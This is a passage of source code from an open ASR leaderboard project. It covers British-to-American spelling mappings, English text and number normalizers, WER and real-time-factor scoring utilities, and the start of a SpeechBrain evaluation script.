'stigmatized', 'stigmatises': 'stigmatizes', 'stigmatising': 'stigmatizing', 'storey': 'story', 'storeys': 'stories', 'subsidisation': 'subsidization', 'subsidise': 'subsidize', 'subsidised': 'subsidized', 'subsidiser': 'subsidizer', 'subsidisers': 'subsidizers', 'subsidises': 'subsidizes', 'subsidising': 'subsidizing', 'succour': 'succor', 'succoured': 'succored', 'succouring': 'succoring', 'succours': 'succors', 'sulphate': 'sulfate', 'sulphates': 'sulfates', 'sulphide': 'sulfide', 'sulphides': 'sulfides', 'sulphur': 'sulfur', 'sulphurous': 'sulfurous', 'summarise': 'summarize', 'summarised': 'summarized', 'summarises': 'summarizes', 'summarising': 'summarizing', 'swivelled': 'swiveled', 'swivelling': 'swiveling', 'symbolise': 'symbolize', 'symbolised': 'symbolized', 'symbolises': 'symbolizes', 'symbolising': 'symbolizing', 'sympathise': 'sympathize', 'sympathised': 'sympathized', 'sympathiser': 'sympathizer', 'sympathisers': 'sympathizers', 'sympathises': 'sympathizes', 'sympathising': 'sympathizing', 'synchronisation': 'synchronization', 'synchronise': 'synchronize', 'synchronised': 'synchronized', 'synchronises': 'synchronizes', 'synchronising': 'synchronizing', 'synthesise': 'synthesize', 'synthesised': 'synthesized', 'synthesiser': 'synthesizer', 'synthesisers': 'synthesizers', 'synthesises': 'synthesizes', 'synthesising': 'synthesizing', 'syphon': 'siphon', 'syphoned': 'siphoned', 'syphoning': 'siphoning', 'syphons': 'siphons', 'systematisation': 'systematization', 'systematise': 'systematize', 'systematised': 'systematized', 'systematises': 'systematizes', 'systematising': 'systematizing', 'tantalise': 'tantalize', 'tantalised': 'tantalized', 'tantalises': 'tantalizes', 'tantalising': 'tantalizing', 'tantalisingly': 'tantalizingly', 'tasselled': 'tasseled', 'technicolour': 'technicolor', 'temporise': 'temporize', 'temporised': 'temporized', 'temporises': 'temporizes', 'temporising': 'temporizing', 'tenderise': 'tenderize', 'tenderised': 'tenderized', 'tenderises': 'tenderizes', 'tenderising': 'tenderizing', 'terrorise': 'terrorize', 'terrorised': 'terrorized', 'terrorises': 'terrorizes', 'terrorising': 'terrorizing', 'theatre': 'theater', 'theatregoer': 'theatergoer', 'theatregoers': 'theatergoers', 'theatres': 'theaters', 'theorise': 'theorize', 'theorised': 'theorized', 'theorises': 'theorizes', 'theorising': 'theorizing', 'tonne': 'ton', 'tonnes': 'tons', 'towelled': 'toweled', 'towelling': 'toweling', 'toxaemia': 'toxemia', 'tranquillise': 'tranquilize', 'tranquillised': 'tranquilized', 'tranquilliser': 'tranquilizer', 'tranquillisers': 'tranquilizers', 'tranquillises': 'tranquilizes', 'tranquillising': 'tranquilizing', 'tranquillity': 'tranquility', 'tranquillize': 'tranquilize', 'tranquillized': 'tranquilized', 'tranquillizer': 'tranquilizer', 'tranquillizers': 'tranquilizers', 'tranquillizes': 'tranquilizes', 'tranquillizing': 'tranquilizing', 'tranquilly': 'tranquility', 'transistorised': 'transistorized', 'traumatise': 'traumatize', 'traumatised': 'traumatized', 'traumatises': 'traumatizes', 'traumatising': 'traumatizing', 'travelled': 'traveled', 'traveller': 'traveler', 'travellers': 'travelers', 'travelling': 'traveling', 'travelog': 'travelogue', 'travelogs': 'travelogues', 'trialled': 'trialed', 'trialling': 'trialing', 'tricolour': 'tricolor', 'tricolours': 'tricolors', 'trivialise': 'trivialize', 'trivialised': 'trivialized', 'trivialises': 'trivializes', 'trivialising': 'trivializing', 'tumour': 'tumor', 'tumours': 'tumors', 'tunnelled': 'tunneled', 'tunnelling': 'tunneling', 'tyrannise': 'tyrannize', 'tyrannised': 'tyrannized', 'tyrannises': 'tyrannizes', 'tyrannising': 'tyrannizing', 'tyre': 'tire', 'tyres': 'tires', 'unauthorised': 'unauthorized', 'uncivilised': 'uncivilized', 'underutilised': 'underutilized', 'unequalled': 'unequaled', 'unfavourable': 'unfavorable', 'unfavourably': 'unfavorably', 'unionisation': 'unionization', 'unionise': 'unionize', 'unionised': 'unionized', 'unionises': 'unionizes', 'unionising': 'unionizing', 'unorganised': 'unorganized', 'unravelled': 'unraveled', 'unravelling': 'unraveling', 'unrecognisable': 'unrecognizable', 'unrecognised': 'unrecognized', 'unrivalled': 'unrivaled', 'unsavoury': 'unsavory', 'untrammelled': 'untrammeled', 'urbanisation': 'urbanization', 'urbanise': 'urbanize', 'urbanised': 'urbanized', 'urbanises': 'urbanizes', 'urbanising': 'urbanizing', 'utilisable': 'utilizable', 'utilisation': 'utilization', 'utilise': 'utilize', 'utilised': 'utilized', 'utilises': 'utilizes', 'utilising': 'utilizing', 'valour': 'valor', 'vandalise': 'vandalize', 'vandalised': 'vandalized', 'vandalises': 'vandalizes', 'vandalising': 'vandalizing', 'vaporisation': 'vaporization', 'vaporise': 'vaporize', 'vaporised': 'vaporized', 'vaporises': 'vaporizes', 'vaporising': 'vaporizing', 'vapour': 'vapor', 'vapours': 'vapors', 'verbalise': 'verbalize', 'verbalised': 'verbalized', 'verbalises': 'verbalizes', 'verbalising': 'verbalizing', 'victimisation': 'victimization', 'victimise': 'victimize', 'victimised': 'victimized', 'victimises': 'victimizes', 'victimising': 'victimizing', 'videodisc': 'videodisk', 'videodiscs': 'videodisks', 'vigour': 'vigor', 'visualisation': 'visualization', 'visualisations': 'visualizations', 'visualise': 'visualize', 'visualised': 'visualized', 'visualises': 'visualizes', 'visualising': 'visualizing', 'vocalisation': 'vocalization', 'vocalisations': 'vocalizations', 'vocalise': 'vocalize', 'vocalised': 'vocalized', 'vocalises': 'vocalizes', 'vocalising': 'vocalizing', 'vulcanised': 'vulcanized', 'vulgarisation': 'vulgarization', 'vulgarise': 'vulgarize', 'vulgarised': 'vulgarized', 'vulgarises': 'vulgarizes', 'vulgarising': 'vulgarizing', 'waggon': 'wagon', 'waggons': 'wagons', 'watercolour': 'watercolor', 'watercolours': 'watercolors', 'weaselled': 'weaseled', 'weaselling': 'weaseling', 'westernisation': 'westernization', 'westernise': 'westernize', 'westernised': 'westernized', 'westernises': 'westernizes', 'westernising': 'westernizing', 'womanise': 'womanize', 'womanised': 'womanized', 'womaniser': 'womanizer', 'womanisers': 'womanizers', 'womanises': 'womanizes', 'womanising': 'womanizing', 'woollen': 'woolen', 'woollens': 'woolens', 'woollies': 'woolies', 'woolly': 'wooly', 'worshipped': 'worshiped', 'worshipper': 'worshiper', 'worshipping': 'worshiping', 'yodelled': 'yodeled', 'yodelling': 'yodeling', 'yoghourt': 'yogurt', 'yoghourts': 'yogurts', 'yoghurt': 'yogurt', 'yoghurts': 'yogurts'}
218
+
219
+ # File: open_asr_leaderboard-main/normalizer/eval_utils.py
220
+ import os
221
+ import glob
222
+ import json
223
+ import evaluate
224
+ from collections import defaultdict
225
+
226
+ def read_manifest(manifest_path: str):
227
+ data = []
228
+ with open(manifest_path, 'r', encoding='utf-8') as f:
229
+ for line in f:
230
+ if len(line) > 0:
231
+ datum = json.loads(line)
232
+ data.append(datum)
233
+ return data
234
+
235
+ def write_manifest(references: list, transcriptions: list, model_id: str, dataset_path: str, dataset_name: str, split: str, audio_length: list=None, transcription_time: list=None):
236
+ model_id = model_id.replace('/', '-')
237
+ dataset_path = dataset_path.replace('/', '-')
238
+ dataset_name = dataset_name.replace('/', '-')
239
+ if len(references) != len(transcriptions):
240
+ raise ValueError(f'The number of samples in `references` ({len(references)}) must match `transcriptions` ({len(transcriptions)}).')
241
+ if audio_length is not None and len(audio_length) != len(references):
242
+ raise ValueError(f'The number of samples in `audio_length` ({len(audio_length)}) must match `references` ({len(references)}).')
243
+ if transcription_time is not None and len(transcription_time) != len(references):
244
+ raise ValueError(f'The number of samples in `transcription_time` ({len(transcription_time)}) must match `references` ({len(references)}).')
245
+ audio_length = audio_length if audio_length is not None else len(references) * [None]
246
+ transcription_time = transcription_time if transcription_time is not None else len(references) * [None]
247
+ basedir = './results/'
248
+ if not os.path.exists(basedir):
249
+ os.makedirs(basedir)
250
+ manifest_path = os.path.join(basedir, f'MODEL_{model_id}_DATASET_{dataset_path}_{dataset_name}_{split}.jsonl')
251
+ with open(manifest_path, 'w', encoding='utf-8') as f:
252
+ for (idx, (text, transcript, audio_length, transcription_time)) in enumerate(zip(references, transcriptions, audio_length, transcription_time)):
253
+ datum = {'audio_filepath': f'sample_{idx}', 'duration': audio_length, 'time': transcription_time, 'text': text, 'pred_text': transcript}
254
+ f.write(f'{json.dumps(datum, ensure_ascii=False)}\n')
255
+ return manifest_path
256
+
257
+ def score_results(directory: str, model_id: str=None):
258
+ if directory.endswith(os.pathsep):
259
+ directory = directory[:-1]
260
+ result_files = list(glob.glob(f'{directory}/**/*.jsonl', recursive=True))
261
+ result_files = list(sorted(result_files))
262
+ if model_id is not None and model_id != '':
263
+ print('Filtering models by id:', model_id)
264
+ model_id = model_id.replace('/', '-')
265
+ result_files = [fp for fp in result_files if model_id in fp]
266
+ if len(result_files) == 0:
267
+ raise ValueError(f'No result files found in {directory}')
268
+
269
+ def parse_filepath(fp: str):
270
+ model_index = fp.find('MODEL_')
271
+ fp = fp[model_index:]
272
+ ds_index = fp.find('DATASET_')
273
+ model_id = fp[:ds_index].replace('MODEL_', '').rstrip('_')
274
+ author_index = model_id.find('-')
275
+ model_id = model_id[:author_index] + '/' + model_id[author_index + 1:]
276
+ ds_fp = fp[ds_index:]
277
+ dataset_id = ds_fp.replace('DATASET_', '').rstrip('.jsonl')
278
+ return (model_id, dataset_id)
279
+ results = {}
280
+ wer_metric = evaluate.load('wer')
281
+ for result_file in result_files:
282
+ manifest = read_manifest(result_file)
283
+ (model_id_of_file, dataset_id) = parse_filepath(result_file)
284
+ references = [datum['text'] for datum in manifest]
285
+ predictions = [datum['pred_text'] for datum in manifest]
286
+ time = [datum['time'] for datum in manifest]
287
+ duration = [datum['duration'] for datum in manifest]
288
+ compute_rtfx = all(time) and all(duration)
289
+ wer = wer_metric.compute(references=references, predictions=predictions)
290
+ wer = round(100 * wer, 2)
291
+ if compute_rtfx:
292
+ audio_length = sum(duration)
293
+ inference_time = sum(time)
294
+ rtfx = round(sum(duration) / sum(time), 4)
295
+ else:
296
+ audio_length = inference_time = rtfx = None
297
+ result_key = f'{model_id_of_file} | {dataset_id}'
298
+ results[result_key] = {'wer': wer, 'audio_length': audio_length, 'inference_time': inference_time, 'rtfx': rtfx}
299
+ print('*' * 80)
300
+ print('Results per dataset:')
301
+ print('*' * 80)
302
+ for (k, v) in results.items():
303
+ metrics = f"{k}: WER = {v['wer']:0.2f} %"
304
+ if v['rtfx'] is not None:
305
+ metrics += f", RTFx = {v['rtfx']:0.2f}"
306
+ print(metrics)
307
+ composite_wer = defaultdict(float)
308
+ composite_audio_length = defaultdict(float)
309
+ composite_inference_time = defaultdict(float)
310
+ count_entries = defaultdict(int)
311
+ for (k, v) in results.items():
312
+ key = k.split('|')[0].strip()
313
+ composite_wer[key] += v['wer']
314
+ if v['rtfx'] is not None:
315
+ composite_audio_length[key] += v['audio_length']
316
+ composite_inference_time[key] += v['inference_time']
317
+ else:
318
+ composite_audio_length[key] = composite_inference_time[key] = None
319
+ count_entries[key] += 1
320
+ print()
321
+ print('*' * 80)
322
+ print('Composite Results:')
323
+ print('*' * 80)
324
+ for (k, v) in composite_wer.items():
325
+ wer = v / count_entries[k]
326
+ print(f'{k}: WER = {wer:0.2f} %')
327
+ for k in composite_audio_length:
328
+ if composite_audio_length[k] is not None:
329
+ rtfx = composite_audio_length[k] / composite_inference_time[k]
330
+ print(f'{k}: RTFx = {rtfx:0.2f}')
331
+ print('*' * 80)
332
+ return (composite_wer, results)
333
+
334
+ # File: open_asr_leaderboard-main/normalizer/normalizer.py
335
+ import re
336
+ import unicodedata
337
+ from fractions import Fraction
338
+ from typing import Iterator, List, Match, Optional, Union
339
+ from .english_abbreviations import english_spelling_normalizer
340
+ import regex
341
+ ADDITIONAL_DIACRITICS = {'œ': 'oe', 'Œ': 'OE', 'ø': 'o', 'Ø': 'O', 'æ': 'ae', 'Æ': 'AE', 'ß': 'ss', 'ẞ': 'SS', 'đ': 'd', 'Đ': 'D', 'ð': 'd', 'Ð': 'D', 'þ': 'th', 'Þ': 'th', 'ł': 'l', 'Ł': 'L'}
342
+
343
+ def remove_symbols_and_diacritics(s: str, keep=''):
344
+
345
+ def replace_character(char):
346
+ if char in keep:
347
+ return char
348
+ elif char in ADDITIONAL_DIACRITICS:
349
+ return ADDITIONAL_DIACRITICS[char]
350
+ elif unicodedata.category(char) == 'Mn':
351
+ return ''
352
+ elif unicodedata.category(char)[0] in 'MSP':
353
+ return ' '
354
+ return char
355
+ return ''.join((replace_character(c) for c in unicodedata.normalize('NFKD', s)))
356
+
357
+ def remove_symbols(s: str):
358
+ return ''.join((' ' if unicodedata.category(c)[0] in 'MSP' else c for c in unicodedata.normalize('NFKC', s)))
359
+
360
+ class BasicTextNormalizer:
361
+
362
+ def __init__(self, remove_diacritics: bool=False, split_letters: bool=False):
363
+ self.clean = remove_symbols_and_diacritics if remove_diacritics else remove_symbols
364
+ self.split_letters = split_letters
365
+
366
+ def __call__(self, s: str):
367
+ s = s.lower()
368
+ s = re.sub('[<\\[][^>\\]]*[>\\]]', '', s)
369
+ s = re.sub('\\(([^)]+?)\\)', '', s)
370
+ s = self.clean(s).lower()
371
+ if self.split_letters:
372
+ s = ' '.join(regex.findall('\\X', s, regex.U))
373
+ s = re.sub('\\s+', ' ', s)
374
+ return s
375
+
376
+ class EnglishNumberNormalizer:
377
+
378
+ def __init__(self):
379
+ super().__init__()
380
+ self.zeros = {'o', 'oh', 'zero'}
381
+ self.ones = {name: i for (i, name) in enumerate(['one', 'two', 'three', 'four', 'five', 'six', 'seven', 'eight', 'nine', 'ten', 'eleven', 'twelve', 'thirteen', 'fourteen', 'fifteen', 'sixteen', 'seventeen', 'eighteen', 'nineteen'], start=1)}
382
+ self.ones_plural = {'sixes' if name == 'six' else name + 's': (value, 's') for (name, value) in self.ones.items()}
383
+ self.ones_ordinal = {'zeroth': (0, 'th'), 'first': (1, 'st'), 'second': (2, 'nd'), 'third': (3, 'rd'), 'fifth': (5, 'th'), 'twelfth': (12, 'th'), **{name + ('h' if name.endswith('t') else 'th'): (value, 'th') for (name, value) in self.ones.items() if value > 3 and value != 5 and (value != 12)}}
384
+ self.ones_suffixed = {**self.ones_plural, **self.ones_ordinal}
385
+ self.tens = {'twenty': 20, 'thirty': 30, 'forty': 40, 'fifty': 50, 'sixty': 60, 'seventy': 70, 'eighty': 80, 'ninety': 90}
386
+ self.tens_plural = {name.replace('y', 'ies'): (value, 's') for (name, value) in self.tens.items()}
387
+ self.tens_ordinal = {name.replace('y', 'ieth'): (value, 'th') for (name, value) in self.tens.items()}
388
+ self.tens_suffixed = {**self.tens_plural, **self.tens_ordinal}
389
+ self.multipliers = {'hundred': 100, 'thousand': 1000, 'million': 1000000, 'billion': 1000000000, 'trillion': 1000000000000, 'quadrillion': 1000000000000000, 'quintillion': 1000000000000000000, 'sextillion': 1000000000000000000000, 'septillion': 1000000000000000000000000, 'octillion': 1000000000000000000000000000, 'nonillion': 1000000000000000000000000000000, 'decillion': 1000000000000000000000000000000000}
390
+ self.multipliers_plural = {name + 's': (value, 's') for (name, value) in self.multipliers.items()}
391
+ self.multipliers_ordinal = {name + 'th': (value, 'th') for (name, value) in self.multipliers.items()}
392
+ self.multipliers_suffixed = {**self.multipliers_plural, **self.multipliers_ordinal}
393
+ self.decimals = {*self.ones, *self.tens, *self.zeros}
394
+ self.preceding_prefixers = {'minus': '-', 'negative': '-', 'plus': '+', 'positive': '+'}
395
+ self.following_prefixers = {'pound': '£', 'pounds': '£', 'euro': '€', 'euros': '€', 'dollar': '$', 'dollars': '$', 'cent': '¢', 'cents': '¢'}
396
+ self.prefixes = set(list(self.preceding_prefixers.values()) + list(self.following_prefixers.values()))
397
+ self.suffixers = {'per': {'cent': '%'}, 'percent': '%'}
398
+ self.specials = {'and', 'double', 'triple', 'point'}
399
+ self.words = {key for mapping in [self.zeros, self.ones, self.ones_suffixed, self.tens, self.tens_suffixed, self.multipliers, self.multipliers_suffixed, self.preceding_prefixers, self.following_prefixers, self.suffixers, self.specials] for key in mapping}
400
+ self.literal_words = {'one', 'ones'}
401
+
402
+ def process_words(self, words: List[str]) -> Iterator[str]:
403
+ prefix: Optional[str] = None
404
+ value: Optional[Union[str, int]] = None
405
+ skip = False
406
+
407
+ def to_fraction(s: str):
408
+ try:
409
+ return Fraction(s)
410
+ except ValueError:
411
+ return None
412
+
413
+ def output(result: Union[str, int]):
414
+ nonlocal prefix, value
415
+ result = str(result)
416
+ if prefix is not None:
417
+ result = prefix + result
418
+ value = None
419
+ prefix = None
420
+ return result
421
+ if len(words) == 0:
422
+ return
423
+ for (i, current) in enumerate(words):
424
+ prev = words[i - 1] if i != 0 else None
425
+ next = words[i + 1] if i != len(words) - 1 else None
426
+ if skip:
427
+ skip = False
428
+ continue
429
+ next_is_numeric = next is not None and re.match('^\\d+(\\.\\d+)?$', next)
430
+ has_prefix = current[0] in self.prefixes
431
+ current_without_prefix = current[1:] if has_prefix else current
432
+ if re.match('^\\d+(\\.\\d+)?$', current_without_prefix):
433
+ f = to_fraction(current_without_prefix)
434
+ if f is None:
435
+ raise ValueError('Converting the fraction failed')
436
+ if value is not None:
437
+ if isinstance(value, str) and value.endswith('.'):
438
+ value = str(value) + str(current)
439
+ continue
440
+ else:
441
+ yield output(value)
442
+ prefix = current[0] if has_prefix else prefix
443
+ if f.denominator == 1:
444
+ value = f.numerator
445
+ else:
446
+ value = current_without_prefix
447
+ elif current not in self.words:
448
+ if value is not None:
449
+ yield output(value)
450
+ yield output(current)
451
+ elif current in self.zeros:
452
+ value = str(value or '') + '0'
453
+ elif current in self.ones:
454
+ ones = self.ones[current]
455
+ if value is None:
456
+ value = ones
457
+ elif isinstance(value, str) or prev in self.ones:
458
+ if prev in self.tens and ones < 10:
459
+ value = value[:-1] + str(ones)
460
+ else:
461
+ value = str(value) + str(ones)
462
+ elif ones < 10:
463
+ if value % 10 == 0:
464
+ value += ones
465
+ else:
466
+ value = str(value) + str(ones)
467
+ elif value % 100 == 0:
468
+ value += ones
469
+ else:
470
+ value = str(value) + str(ones)
471
+ elif current in self.ones_suffixed:
472
+ (ones, suffix) = self.ones_suffixed[current]
473
+ if value is None:
474
+ yield output(str(ones) + suffix)
475
+ elif isinstance(value, str) or prev in self.ones:
476
+ if prev in self.tens and ones < 10:
477
+ yield output(value[:-1] + str(ones) + suffix)
478
+ else:
479
+ yield output(str(value) + str(ones) + suffix)
480
+ elif ones < 10:
481
+ if value % 10 == 0:
482
+ yield output(str(value + ones) + suffix)
483
+ else:
484
+ yield output(str(value) + str(ones) + suffix)
485
+ elif value % 100 == 0:
486
+ yield output(str(value + ones) + suffix)
487
+ else:
488
+ yield output(str(value) + str(ones) + suffix)
489
+ value = None
490
+ elif current in self.tens:
491
+ tens = self.tens[current]
492
+ if value is None:
493
+ value = tens
494
+ elif isinstance(value, str):
495
+ value = str(value) + str(tens)
496
+ elif value % 100 == 0:
497
+ value += tens
498
+ else:
499
+ value = str(value) + str(tens)
500
+ elif current in self.tens_suffixed:
501
+ (tens, suffix) = self.tens_suffixed[current]
502
+ if value is None:
503
+ yield output(str(tens) + suffix)
504
+ elif isinstance(value, str):
505
+ yield output(str(value) + str(tens) + suffix)
506
+ elif value % 100 == 0:
507
+ yield output(str(value + tens) + suffix)
508
+ else:
509
+ yield output(str(value) + str(tens) + suffix)
510
+ elif current in self.multipliers:
511
+ multiplier = self.multipliers[current]
512
+ if value is None:
513
+ value = multiplier
514
+ elif isinstance(value, str) or value == 0:
515
+ f = to_fraction(value)
516
+ p = f * multiplier if f is not None else None
517
+ if f is not None and p.denominator == 1:
518
+ value = p.numerator
519
+ else:
520
+ yield output(value)
521
+ value = multiplier
522
+ else:
523
+ before = value // 1000 * 1000
524
+ residual = value % 1000
525
+ value = before + residual * multiplier
526
+ elif current in self.multipliers_suffixed:
527
+ (multiplier, suffix) = self.multipliers_suffixed[current]
528
+ if value is None:
529
+ yield output(str(multiplier) + suffix)
530
+ elif isinstance(value, str):
531
+ f = to_fraction(value)
532
+ p = f * multiplier if f is not None else None
533
+ if f is not None and p.denominator == 1:
534
+ yield output(str(p.numerator) + suffix)
535
+ else:
536
+ yield output(value)
537
+ yield output(str(multiplier) + suffix)
538
+ else:
539
+ before = value // 1000 * 1000
540
+ residual = value % 1000
541
+ value = before + residual * multiplier
542
+ yield output(str(value) + suffix)
543
+ value = None
544
+ elif current in self.preceding_prefixers:
545
+ if value is not None:
546
+ yield output(value)
547
+ if next in self.words or next_is_numeric:
548
+ prefix = self.preceding_prefixers[current]
549
+ else:
550
+ yield output(current)
551
+ elif current in self.following_prefixers:
552
+ if value is not None:
553
+ prefix = self.following_prefixers[current]
554
+ yield output(value)
555
+ else:
556
+ yield output(current)
557
+ elif current in self.suffixers:
558
+ if value is not None:
559
+ suffix = self.suffixers[current]
560
+ if isinstance(suffix, dict):
561
+ if next in suffix:
562
+ yield output(str(value) + suffix[next])
563
+ skip = True
564
+ else:
565
+ yield output(value)
566
+ yield output(current)
567
+ else:
568
+ yield output(str(value) + suffix)
569
+ else:
570
+ yield output(current)
571
+ elif current in self.specials:
572
+ if next not in self.words and (not next_is_numeric):
573
+ if value is not None:
574
+ yield output(value)
575
+ yield output(current)
576
+ elif current == 'and':
577
+ if prev not in self.multipliers:
578
+ if value is not None:
579
+ yield output(value)
580
+ yield output(current)
581
+ elif current == 'double' or current == 'triple':
582
+ if next in self.ones or next in self.zeros:
583
+ repeats = 2 if current == 'double' else 3
584
+ ones = self.ones.get(next, 0)
585
+ value = str(value or '') + str(ones) * repeats
586
+ skip = True
587
+ else:
588
+ if value is not None:
589
+ yield output(value)
590
+ yield output(current)
591
+ elif current == 'point':
592
+ if next in self.decimals or next_is_numeric:
593
+ value = str(value or '') + '.'
594
+ else:
595
+ raise ValueError(f'Unexpected token: {current}')
596
+ else:
597
+ raise ValueError(f'Unexpected token: {current}')
598
+ if value is not None:
599
+ yield output(value)
600
+
601
+ def preprocess(self, s: str):
602
+ results = []
603
+ segments = re.split('\\band\\s+a\\s+half\\b', s)
604
+ for (i, segment) in enumerate(segments):
605
+ if len(segment.strip()) == 0:
606
+ continue
607
+ if i == len(segments) - 1:
608
+ results.append(segment)
609
+ else:
610
+ results.append(segment)
611
+ last_word = segment.rsplit(maxsplit=2)[-1]
612
+ if last_word in self.decimals or last_word in self.multipliers:
613
+ results.append('point five')
614
+ else:
615
+ results.append('and a half')
616
+ s = ' '.join(results)
617
+ s = re.sub('([a-z])([0-9])', '\\1 \\2', s)
618
+ s = re.sub('([0-9])([a-z])', '\\1 \\2', s)
619
+ s = re.sub('([0-9])\\s+(st|nd|rd|th|s)\\b', '\\1\\2', s)
620
+ return s
621
+
622
+ def postprocess(self, s: str):
623
+
624
+ def combine_cents(m: Match):
625
+ try:
626
+ currency = m.group(1)
627
+ integer = m.group(2)
628
+ cents = int(m.group(3))
629
+ return f'{currency}{integer}.{cents:02d}'
630
+ except ValueError:
631
+ return m.string
632
+
633
+ def extract_cents(m: Match):
634
+ try:
635
+ return f'¢{int(m.group(1))}'
636
+ except ValueError:
637
+ return m.string
638
+ s = re.sub('([€£$])([0-9]+) (?:and )?¢([0-9]{1,2})\\b', combine_cents, s)
639
+ s = re.sub('[€£$]0.([0-9]{1,2})\\b', extract_cents, s)
640
+ s = re.sub('\\b1(s?)\\b', 'one\\1', s)
641
+ return s
642
+
643
+ def __call__(self, s: str):
644
+ s = self.preprocess(s)
645
+ s = ' '.join((word for word in self.process_words(s.split()) if word is not None))
646
+ s = self.postprocess(s)
647
+ return s
648
+
649
+ class EnglishSpellingNormalizer:
650
+
651
+ def __init__(self, english_spelling_mapping):
652
+ self.mapping = english_spelling_mapping
653
+
654
+ def __call__(self, s: str):
655
+ return ' '.join((self.mapping.get(word, word) for word in s.split()))
656
+
657
+ class EnglishTextNormalizer:
658
+
659
+ def __init__(self, english_spelling_mapping=english_spelling_normalizer):
660
+ self.ignore_patterns = '\\b(hmm|mm|mhm|mmm|uh|um)\\b'
661
+ self.replacers = {"\\bwon't\\b": 'will not', "\\bcan't\\b": 'can not', "\\blet's\\b": 'let us', "\\bain't\\b": 'aint', "\\by'all\\b": 'you all', '\\bwanna\\b': 'want to', '\\bgotta\\b': 'got to', '\\bgonna\\b': 'going to', "\\bi'ma\\b": 'i am going to', '\\bimma\\b': 'i am going to', '\\bwoulda\\b': 'would have', '\\bcoulda\\b': 'could have', '\\bshoulda\\b': 'should have', "\\bma'am\\b": 'madam', '\\bmr\\b': 'mister ', '\\bmrs\\b': 'missus ', '\\bst\\b': 'saint ', '\\bdr\\b': 'doctor ', '\\bprof\\b': 'professor ', '\\bcapt\\b': 'captain ', '\\bgov\\b': 'governor ', '\\bald\\b': 'alderman ', '\\bgen\\b': 'general ', '\\bsen\\b': 'senator ', '\\brep\\b': 'representative ', '\\bpres\\b': 'president ', '\\brev\\b': 'reverend ', '\\bhon\\b': 'honorable ', '\\basst\\b': 'assistant ', '\\bassoc\\b': 'associate ', '\\blt\\b': 'lieutenant ', '\\bcol\\b': 'colonel ', '\\bjr\\b': 'junior ', '\\bsr\\b': 'senior ', '\\besq\\b': 'esquire ', "'d been\\b": ' had been', "'s been\\b": ' has been', "'d gone\\b": ' had gone', "'s gone\\b": ' has gone', "'d done\\b": ' had done', "'s got\\b": ' has got', "n't\\b": ' not', "'re\\b": ' are', "'s\\b": ' is', "'d\\b": ' would', "'ll\\b": ' will', "'t\\b": ' not', "'ve\\b": ' have', "'m\\b": ' am'}
662
+ self.standardize_numbers = EnglishNumberNormalizer()
663
+ self.standardize_spellings = EnglishSpellingNormalizer(english_spelling_mapping)
664
+
665
+ def __call__(self, s: str):
666
+ s = s.lower()
667
+ s = re.sub('[<\\[][^>\\]]*[>\\]]', '', s)
668
+ s = re.sub('\\(([^)]+?)\\)', '', s)
669
+ s = re.sub(self.ignore_patterns, '', s)
670
+ s = re.sub("\\s+'", "'", s)
671
+ for (pattern, replacement) in self.replacers.items():
672
+ s = re.sub(pattern, replacement, s)
673
+ s = re.sub('(\\d),(\\d)', '\\1\\2', s)
674
+ s = re.sub('\\.([^0-9]|$)', ' \\1', s)
675
+ s = remove_symbols_and_diacritics(s, keep='.%$¢€£')
676
+ s = self.standardize_numbers(s)
677
+ s = self.standardize_spellings(s)
678
+ s = re.sub('[.$¢€£]([^0-9])', ' \\1', s)
679
+ s = re.sub('([^0-9])%', '\\1 ', s)
680
+ s = re.sub('\\s+', ' ', s)
681
+ return s
682
+
683
+ # File: open_asr_leaderboard-main/speechbrain/run_eval.py
684
+ """"""
685
+ import argparse
686
+ import time
687
+ import evaluate
688
+ from normalizer import data_utils
689
+ from tqdm import tqdm
690
+ import torch
691
+ import speechbrain.inference.ASR as ASR
692
+ from speechbrain.utils.data_utils import batch_pad_right
693
+ import os
694
+
695
+ def get_model(speechbrain_repository: str, speechbrain_pretrained_class_name: str, **kwargs):
696
+ run_opt_defaults = {'device': 'cpu', 'data_parallel_count': -1, 'data_parallel_backend': False, 'distributed_launch': False, 'distributed_backend': 'nccl', 'jit_module_keys': None}
697
+ run_opts = {**run_opt_defaults, **kwargs}
698
+ kwargs = {'source': f'{speechbrain_repository}', 'savedir': f'pretrained_models/{speechbrain_repository}', 'run_opts': run_opts}
699
+ try:
700
+ model_class = getattr(ASR, speechbrain_pretrained_class_name)
701
+ except AttributeError:
702
+ raise AttributeError(f'SpeechBrain Pretrained class: {speechbrain_pretrained_class_name} not found in pretrained.py')
703
+ return model_class.from_hparams(**kwargs)
704
+
705
+ def main(args):
706
+ if args.device == -1:
707
+ device = 'cpu'
708
+ else:
709
+ device = f'cuda:{args.device}'
710
+ model = get_model(args.source, args.speechbrain_pretrained_class_name, device=device)
711
+
712
+ def benchmark(batch):
713
+ audios = [torch.from_numpy(sample['array']) for sample in batch['audio']]
714
+ minibatch_size = len(audios)
715
+ start_time = time.time()
716
+ (audios, audio_lens) = batch_pad_right(audios)
717
+ audios = audios.to(device)
718
+ audio_lens = audio_lens.to(device)
719
+ (predictions, _) = model.transcribe_batch(audios, audio_lens)
720
+ runtime = time.time() - start_time
721
+ batch['transcription_time_s'] = minibatch_size * [runtime / minibatch_size]
722
+ batch['predictions'] = [data_utils.normalizer(pred) for pred in predictions]
723
+ batch['references'] = batch['norm_text']
724
+ return batch
725
+ if args.warmup_steps is not None:
726
+ dataset = data_utils.load_data(args)
727
+ dataset = data_utils.prepare_data(dataset)
728
+ num_warmup_samples = args.warmup_steps * args.batch_size
729
+ if args.streaming:
730
+ warmup_dataset = dataset.take(num_warmup_samples)
731
+ else:
732
+ warmup_dataset = dataset.select(range(min(num_warmup_samples, len(dataset))))
733
+ warmup_dataset = iter(warmup_dataset.map(benchmark, batch_size=args.batch_size, batched=True))
734
+ for _ in tqdm(warmup_dataset, desc='Warming up...'):
735
+ continue
736
+ dataset = data_utils.load_data(args)
737
+ if args.max_eval_samples is not None and args.max_eval_samples > 0:
738
+ print(f'Subsampling dataset to first {args.max_eval_samples} samples!')
739
+ if args.streaming:
740
+ dataset = dataset.take(args.max_eval_samples)
741
+ else:
742
+ dataset = dataset.select(range(min(args.max_eval_samples, len(dataset))))
743
+ dataset = data_utils.prepare_data(dataset)
744
+ dataset = dataset.map(benchmark, batch_size=args.batch_size, batched=True, remove_columns=['audio'])
745
+ all_results = {'audio_length_s': [], 'transcription_time_s': [], 'predictions': [], 'references': []}
746
+ result_iter = iter(dataset)
747
+ for result in tqdm(result_iter, desc='Samples...'):
748
+ for key in all_results:
749
+ all_results[key].append(result[key])
750
